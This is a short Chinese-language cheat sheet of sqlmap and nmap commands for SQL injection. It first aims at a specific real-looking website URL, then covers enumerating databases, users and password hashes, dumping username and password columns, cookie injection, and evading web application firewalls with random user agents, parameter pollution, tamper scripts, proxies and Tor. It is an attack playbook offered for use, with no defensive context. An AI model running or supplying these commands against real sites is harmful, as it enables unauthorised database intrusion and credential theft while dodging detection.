Sqlmap笔记
sqlmap -u http://www.keruihz.com/news_show.aspx?id=97
sqlmap -u http://www.keruihz.com/news_show.aspx?id=97 --tables
nmap --script=vuln 漏洞扫描脚本
sqlmap -u 注入点 检测注入点是否可用
sqlmap -u 注入点 --batch 自动输入
暴库
sqlmap -u 注入点 --dbs
Web当前使用的数据库
sqlmap -u 注入点 --current-db
Web数据库使用的账户
sqlmap -u 注入点 --current-user
列出sqlserver所有用户
sqlmap -u 注入点 --users
数据库账户与密码
sqlmap -u 注入点 --passwords
列出数据库中的表
sqlmap -u 注入点 -D tourdata --tables (-D指定数据库名称)
列出表中字段
sqlmap -u 注入点 -D tourdata -T userb --columns
爆字段内容
sqlmap -u注入点-D tourdata -T userb -C “email,username,userpassword” --dump (将结果导出)
指定导出特定范围字段内容
sqlmap -u注入点-D tourdata -T userb -C “email,username,userpassword”--start 1 --stop 10 --dump (1,10行数)
Cookie注入
sqlmap -u “注入点” --cookie “id=97” --level 2
sqlmap -u “注入点” --table --cookie “id=97” --level 2
sqlmap -u “注入点” --columns -T “user” --cookie “id=97” --level 2
sqlmap -u “注入点” --dump -C “username,password”--columns -T “user” --cookie “id=97” --level 2
可对以上参数进行结合使用
python sqlmap.py -u “注入点” -f --banner --dbs --users
绕过防火墙注入
确认是否开了WAF
Sqlmap -u “注入点” --thread 10 --identify-waf (首选)
sqlmap -u “注入点” --thread 10 --check-waf 备选
使用参数绕过
Sqlmap -u “注入点” --random-agent -v 2 (浏览器绕过)
Sqlmap -u “注入点” --hpp -v 3 (参数污染绕过)
Sqlmap -u “注入点” --delay=3.5 --time-sec=60
Sqlmap -u “注入点” --proxy=211.211.211.211.8080 --proxy-cred=211.:985 代理注入
sqlmap -u “注入点” --ignore-proxy 禁止用代理注入,直接注入
sqlmap -u “注入点” --flush-session 清空会话,重构注入
sqlmap -u “注入点” -hex 或者--no-cast 进行字符码转换
sqlmap -u “注入点” --mobile 对移动端的服务器进行注入
sqlmap -u “注入点” --tor 匿名注入
脚本注入的格式
sqlmap -u “注入点” --tamper=A.py,B.py A,B是脚本